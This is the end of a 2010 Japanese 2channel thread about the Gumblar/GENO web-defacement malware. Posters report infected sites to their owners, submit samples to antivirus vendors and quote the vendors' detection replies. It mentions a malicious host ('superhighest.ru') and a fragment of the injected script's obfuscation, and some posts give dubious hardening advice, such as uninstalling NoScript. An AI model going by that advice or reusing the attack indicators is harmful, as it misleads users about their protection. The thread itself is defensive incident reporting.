つーか、もうNoScriptのホワイトリストとかIEの信頼済ゾーンとか意味ない感じだよな。
一時許可だけは含めた全拒否か、突かれる穴だけを埋めて全許可の二択だわ。
943名無しさん@お腹いっぱい。:2010/01/28(木) 15:26:24
信じられぬと 嘆くよりも
サイトを信じて 感染するほうがいい〜
944名無しさん@お腹いっぱい。:2010/01/28(木) 15:27:31
それはない。
945名無しさん@お腹いっぱい。:2010/01/28(木) 15:29:20
求めないで 対策なんか
臆病者の 言いわけだから〜
946名無しさん@お腹いっぱい。:2010/01/28(木) 15:40:05
あると思います。
947名無しさん@お腹いっぱい。:2010/01/28(木) 15:43:27
>>942
おれもそう思って、NoScriptをアンインストールした
そうしたら、FireFoxがけっこう軽くなったよw
穴を詰めておいて、これは絶対やばいだろと思うところは
仮想環境で行くことにした
で、最近のメインンブラウザはチョロメになってる
948名無しさん@お腹いっぱい。:2010/01/28(木) 15:44:30
かっけっすね
949名無しさん@お腹いっぱい。:2010/01/28(木) 15:50:18
外向き8080遮断でいいんじゃねーの?
950名無しさん@お腹いっぱい。:2010/01/28(木) 15:51:44
>>922と全く同じコードが埋め込まれてたんだが(もう復旧済み)
これって表示するだけでウイルスやバックドア感染はしないの?
951名無しさん@お腹いっぱい。:2010/01/28(木) 15:55:11
穴があれば感染する。
952名無しさん@お腹いっぱい。:2010/01/28(木) 15:57:34
俺のアナルはゆるゆるだ
953名無しさん@お腹いっぱい。:2010/01/28(木) 15:58:21
>>951
ありがとう…先方に警告出すわ…
コード解析しても意味ないのかな。仕方がいまいち分からん
先方の鯖管が報告してればいいけど
954名無しさん@お腹いっぱい。:2010/01/28(木) 16:05:22
>>925
izushichi めるしました。
oota 直っているようです。ぐぐるキャッシュに/*LGPL*/
roni、test roselog●netは全滅か?、whoisからめるしました。
sunrise●2pg リンク先はみなかったことにして、whoisからめるしました。
955名無しさん@お腹いっぱい。:2010/01/28(木) 16:14:09
>>922
>>950
みたいに画面真っ白表示するのってなんだろう
感染してるってブラウザで丸わかりじゃ意味ないんじゃないのかな?
愉快犯ってことなのかな
956名無しさん@お腹いっぱい。:2010/01/28(木) 16:18:24
真っ白表示された時点で(穴があれば)感染しているから目的は達成されるだろ。
愉快犯ってことにして閲覧者には無害ですとかアナウンスしたいのかもしれんが
覚悟決めろや。
957名無しさん@お腹いっぱい。:2010/01/28(木) 16:28:43
いやいや、普通ならなるべく多く感染させたいから隠すだろ
感染させてやったって表示してるんだから愉快犯(反応を楽しむ)なんじゃね

当然感染もするけどな
958名無しさん@お腹いっぱい。:2010/01/28(木) 16:30:09
愉快犯=実害がないわけじゃないだろjk
959名無しさん@お腹いっぱい。:2010/01/28(木) 16:31:37
>>926
whoisからめるしました。
飛び先は同じなのでコードの貼り付け失敗かも
960名無しさん@お腹いっぱい。:2010/01/28(木) 16:37:51
ウィルス作る奴が何考えてるかなんてわからねーよ
961名無しさん@お腹いっぱい。:2010/01/28(木) 16:45:44
自サイト感染してた知人、ページ復旧してもう安心な気持ちになってる。
話突っ込んだけどもう元に戻したしって危機感もってないみたい。
いや感染してたら危ないって!って言っていいんだよね?
何故あんなに自信満々なんだ……
962名無しさん@お腹いっぱい。:2010/01/28(木) 16:57:19
お前の説明がヘタクソだから
963名無しさん@お腹いっぱい。:2010/01/28(木) 17:01:10
>>927
吹いた
964名無しさん@お腹いっぱい。:2010/01/28(木) 17:04:54
>>961
知人ともども、so-netの記事を読んでみるといいと思う
このへんとか
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2130
965名無しさん@お腹いっぱい。:2010/01/28(木) 17:05:39
sunrise●2pg●inは
<!--<script>--> (省略) <!--</script>-->
になってるのは何なんだろw
966名無しさん@お腹いっぱい。:2010/01/28(木) 17:07:45
superhighest.ru:DEBUG ってなんだよw
967名無しさん@お腹いっぱい。:2010/01/28(木) 17:12:34
DEBUGだけにまだ試行中なんだよ
968名無しさん@お腹いっぱい。:2010/01/28(木) 17:13:59
>>966
(/DEBUG/g, '8080')
969名無しさん@お腹いっぱい。:2010/01/28(木) 17:27:05
>>965
たぶんだけど、やられたことは知っていて
証拠保全とか何か理由があってコメントアウトしたんじゃないかな。
970名無しさん@お腹いっぱい。:2010/01/28(木) 17:56:16
>>922 >>950
これって新しいやつ?報告見たことないけど
971名無しさん@お腹いっぱい。:2010/01/28(木) 17:58:31
>>970
新しいやつ
>>925のDEBUGで報告されてる
972名無しさん@お腹いっぱい。:2010/01/28(木) 18:00:01
ローカルの8080ポートを閉じるのって効果があるの?
リダイレクト先にロシアサーバの8080ポートが使われるってだけで、ローカルの8080ポートは
関係ないと思っていたけど違うのかな?
973名無しさん@お腹いっぱい。:2010/01/28(木) 18:09:50
>>933
ぬかれる
974名無しさん@お腹いっぱい。:2010/01/28(木) 18:11:41
>>972
ない
975名無しさん@お腹いっぱい。:2010/01/28(木) 18:15:49
976名無しさん@お腹いっぱい。:2010/01/28(木) 18:34:37
DEBUG型、未だどこも検知せず…orz
http://www.virustotal.com/analisis/6ad7ae0423e2d87d794d99690420b280db533a8409f6e91067ae9bb9fd400815-1264671185

avastには提出しました。他のもよろしく
977名無しさん@お腹いっぱい。:2010/01/28(木) 18:48:10
978名無しさん@お腹いっぱい。:2010/01/28(木) 18:57:33
>>972
ローカル8080開けてるヤツなんてそんないないからな
979名無しさん@お腹いっぱい。:2010/01/28(木) 19:56:51
提出した人はうpロダに物を上げてもらえんか?
対応してないAVソフトのユーザーは、それ使って検体の提出ができるからさ
980名無しさん@お腹いっぱい。:2010/01/28(木) 20:04:35
>>976
>>925izushichiの分
かすぺ @返信日時:17:34
> Hello,
>
> index.htm_, mikura_index.html_, oshima_index.html_, toshima_index.html_ - Trojan.JS.Agent.bcb
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> Please quote all when answering.
> The answer is relevant to the latest bases from update sources.
> --
> Best regards, Sergey Prokudin
> Virus analyst, Kaspersky Lab.

ESET @返信日時:19:00
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> index.htm - JS/TrojanDownloader.Agent.NRP trojan
> mikura_index.html - JS/TrojanDownloader.Agent.NRP trojan
> oshima_index.html - JS/TrojanDownloader.Agent.NRP trojan
> toshima_index.html - JS/TrojanDownloader.Agent.NRP trojan
>
> Regards,
>
> Daniel Novomesky
> Virus Researcher
> ESET spol. s r.o.
981名無しさん@お腹いっぱい。:2010/01/28(木) 20:18:43
>>925gyomu-yoの分
Fortinet @返信日時:16:09 (あちらの時刻かも。)
> Dear Customer,
>
> Thank you for submitting the sample to Fortinet. We have recently added detection for this malware. The signature will be included in the next regular update.
>
> The sample you submitted will be detected as follows:
> index.html - JS/IFrame.FAC!tr
>
> Best Regards,
> AV Lab - Bob
982名無しさん@お腹いっぱい。:2010/01/28(木) 20:20:24
>>981補足
anime●gyomu-yo●netではなくgyomu-yo●netです。
983名無しさん@お腹いっぱい。:2010/01/28(木) 20:43:39
次スレは重複したここでいいのか?

【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263865118/
984名無しさん@お腹いっぱい。:2010/01/28(木) 20:49:42
>>922
それ今朝やられた。自分とこの場合、一瞬正規のページが表示された後に、nhl-com.stc.com.sa.googleと表示。
avast!で検出されず、aguseで調べたら、「ガブンラー感染の恐れあり」。
今年に入って、これで2回目です。
前回はユーザーからメールと電話で報告を受け、今回は運良く自分で見つけたけど、これって、FTPのパスワードとかの
設定変えたほうがいいのかな?ちなみに鯖はXREAですw
985名無しさん@お腹いっぱい。:2010/01/28(木) 20:50:17
>>984
ぉぃw
986名無しさん@お腹いっぱい。:2010/01/28(木) 20:50:50
毎日変えろ糞が
987名無しさん@お腹いっぱい。:2010/01/28(木) 20:53:49
改ざんされたソース保存してて、ブラウザで閲覧してもまだavast!では検出されませんね。
反映されるまで時間かかるのかな?
988925:2010/01/28(木) 20:55:53
989名無しさん@お腹いっぱい。:2010/01/28(木) 20:55:56
987=984です。

>>986
パスワードの変更の仕方がよくわからんのよ
990984:2010/01/28(木) 21:03:06
>>988
けっこう改ざんされてるとこあるんだね。通報してくれた人本当に乙です
991名無しさん@お腹いっぱい。:2010/01/28(木) 21:06:28
>>988
その中から探してきてくれたあなたこそ乙ですぽ。
992名無しさん@お腹いっぱい。:2010/01/28(木) 21:07:31
>>988
J U M P E R Z . N E T - BBS -
感染のオンパレードわろた
993名無しさん@お腹いっぱい。:2010/01/28(木) 21:07:46
994984:2010/01/28(木) 21:09:00
パスワード変更の方法が分かりました。これからは定期的にパスワード変更します。
995名無しさん@お腹いっぱい。:2010/01/28(木) 21:09:23
次スレ誘導
http://pc11.2ch.net/test/read.cgi/sec/1263865118/
※このスレが重複したやつだが気にすんな
996984:2010/01/28(木) 21:12:40
>>993
今回の改ざんはそうかもしれないですね。でも前回は、今月の中旬頃でした
997名無しさん@お腹いっぱい。:2010/01/28(木) 21:15:26
>>996
OSのクリーンインストールもしてね。
998名無しさん@お腹いっぱい。:2010/01/28(木) 21:20:49
So-net 三つの謎
※中の人ねらー疑惑
※何故マカフィーなのか
※中の人は美少女なのかオサーンなのか
999名無しさん@お腹いっぱい。:2010/01/28(木) 21:23:41
>>998
3番目が最重要だにゃ。

↓1000どぞー
1000名無しさん@お腹いっぱい。:2010/01/28(木) 21:24:09
>※中の人は美少女なのかオサーンなのか
これだけは判る、きっとオサーンなのだw

1000ゲト!
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。